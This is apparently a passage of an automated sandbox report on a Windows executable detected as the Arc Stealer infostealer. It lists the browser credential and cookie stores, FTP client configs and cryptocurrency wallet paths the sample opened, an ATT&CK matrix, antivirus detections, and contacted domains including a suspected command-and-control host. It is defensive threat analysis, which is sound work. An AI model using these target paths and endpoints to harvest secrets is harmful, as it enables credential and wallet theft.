        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: EnumSystemLocalesW,0_2_0038694D
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: GetLocaleInfoW,0_2_0038D300
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0038D429
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_0038CC79
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: GetLocaleInfoW,0_2_0038D52F
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0038D605
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: GetLocaleInfoW,0_2_00386E79
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: EnumSystemLocalesW,0_2_0038CF27
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: EnumSystemLocalesW,0_2_0038CF72
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00376125 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_00376125
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00387A30 GetTimeZoneInformation,0_2_00387A30

        Stealing of Sensitive Information

        barindex
        Yara detected Arc Stealer
        Source: Yara matchFile source: Process Memory Space: Gj8P0mbklo.exe PID: 6256, type: MEMORYSTR
        Found many strings related to Crypto-Wallets (likely being stolen)
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\Electrum\wallets
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\ElectronCash\wallets
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\*
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aming\Exodus
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.0000000005097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\Ethereum
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\MultiDoge
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\Ledger Live
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Tries to harvest and steal ftp login credentials
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\FTP Now\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Program Files (x86)\DeluxeFTP\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Notepad++\plugins\config\NppFTP\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\UltraFXP\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtp\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\FTPBox\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Program Files (x86)\GoFTP\settings\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
        Tries to steal Crypto Currency Wallets
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\BBQCoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Megacoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Mincoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Namecoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Primecoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Terracoin\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
        Source: Yara matchFile source: 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Gj8P0mbklo.exe PID: 6256, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Arc Stealer
        Source: Yara matchFile source: Process Memory Space: Gj8P0mbklo.exe PID: 6256, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Masquerading        		2
        OS Credential Dumping        		2
        System Time Discovery        		Remote Services1
        Archive Collected Data        		21
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information        		LSASS Memory21
        Security Software Discovery        		Remote Desktop Protocol4
        Data from Local System        		2
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading        		NTDS1
        File and Directory Discovery        		Distributed Component Object ModelInput Capture4
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
        System Information Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Gj8P0mbklo.exe58%ReversingLabsWin32.Trojan.Barys
        Gj8P0mbklo.exe62%VirustotalBrowse
        Gj8P0mbklo.exe100%AviraTR/PSW.Coins.ujryq
        Gj8P0mbklo.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        dervinko.biz1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
        http://x1.c.lencr.org/00%URL Reputationsafe
        http://x1.i.lencr.org/00%URL Reputationsafe
        https://recaptcha.net0%URL Reputationsafe
        https://s.ytimg.com;0%Avira URL Cloudsafe
        https://www.gstatic.cn/recaptcha/0%Avira URL Cloudsafe
        https://dervinko.biz/Up/b_0%Avira URL Cloudsafe
        https://dervinko.biz/Up/bAW0%Avira URL Cloudsafe
        https://dervinko.biz/Up0%Avira URL Cloudsafe
        https://dervinko.biz/Up/bistAndAuditAlarmByHandle0%Avira URL Cloudsafe
        https://steam.tv/0%Avira URL Cloudsafe
        https://dervinko.biz/ujs/89737b57-777d-400d-bb7f-77b7e024920e0%Avira URL Cloudsafe
        http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
        https://dervinko.biz/Up0%VirustotalBrowse
        https://lv.queniujq.cn0%Avira URL Cloudsafe
        https://dervinko.biz/q0%Avira URL Cloudsafe
        https://steam.tv/0%VirustotalBrowse
        https://www.gstatic.cn/recaptcha/0%VirustotalBrowse
        https://dervinko.biz0%Avira URL Cloudsafe
        https://recaptcha.net/recaptcha/;0%Avira URL Cloudsafe
        https://dervinko.biz/Up/bistAndAuditAlarmByHandleerta0%Avira URL Cloudsafe
        https://dervinko.biz/ujs/89737b57-777d-400d-bb7f-77b7e024920e0%VirustotalBrowse
        https://medal.tv0%Avira URL Cloudsafe
        https://dervinko.biz/0%Avira URL Cloudsafe
        https://dervinko.biz/Up/byDllc0%Avira URL Cloudsafe
        https://recaptcha.net/recaptcha/;0%VirustotalBrowse
        https://dervinko.biz0%VirustotalBrowse
        https://medal.tv0%VirustotalBrowse
        https://dervinko.biz/Up/b0%Avira URL Cloudsafe
        https://lv.queniujq.cn0%VirustotalBrowse
        http://127.0.0.1:270600%Avira URL Cloudsafe
        https://dervinko.biz/0%VirustotalBrowse
        http://127.0.0.1:270600%VirustotalBrowse
        https://dervinko.biz/Up/b0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        steamcommunity.com
        		23.61.62.148
        		truefalse
          		high
          dervinko.biz
          		104.21.13.203
          		truefalseunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://dervinko.biz/Upfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://dervinko.biz/ujs/89737b57-777d-400d-bb7f-77b7e024920efalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/profiles/76561199609719039false
            		high
            https://dervinko.biz/Up/bfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabGj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://player.vimeo.comGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://duckduckgo.com/ac/?q=Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=_VryGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                    		high
                    https://steamcommunity.com/?subsection=broadcastsGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                      		high
                      https://store.steampowered.com/subscriber_agreement/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                        		high
                        https://www.gstatic.cn/recaptcha/Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                          		high
                          https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=englGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                            		high
                            http://www.valvesoftware.com/legal.htmGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                              		high
                              https://www.youtube.comGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                  		high
                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                    		high
                                    https://www.google.comGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                        		high
                                        https://dervinko.biz/Up/bAWGj8P0mbklo.exe, 00000000.00000003.2151751922.000000000509F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151712465.0000000005090000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://dervinko.biz/Up/b_Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=englishGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                          		high
                                          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                            		high
                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                              		high
                                              https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=englishGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                		high
                                                https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=enGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                  		high
                                                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                    		high
                                                    https://steamcommunity.com/profiles/76561199609719039/badgesGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                      		high
                                                      https://s.ytimg.com;Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      https://steam.tv/Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://dervinko.biz/Up/bistAndAuditAlarmByHandleGj8P0mbklo.exe, 00000000.00000003.2151712465.00000000050CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                        		high
                                                        http://store.steampowered.com/privacy_agreement/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                          		high
                                                          https://store.steampowered.com/points/shop/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://ocsp.rootca1.amazontrust.com0:Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://sketchfab.comGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://lv.queniujq.cnGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • 0%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.youtube.com/Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199609719039[1].htm.0.drfalse
                                                                      		high
                                                                      https://store.steampowered.com/privacy_agreement/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                        		high
                                                                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                          		high
                                                                          https://dervinko.biz/qGj8P0mbklo.exe, 00000000.00000002.2152864496.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                            		high
                                                                            https://www.google.com/recaptcha/Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://checkout.steampowered.com/Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                  		high
                                                                                  https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                    		high
                                                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                      		high
                                                                                      https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                        		high
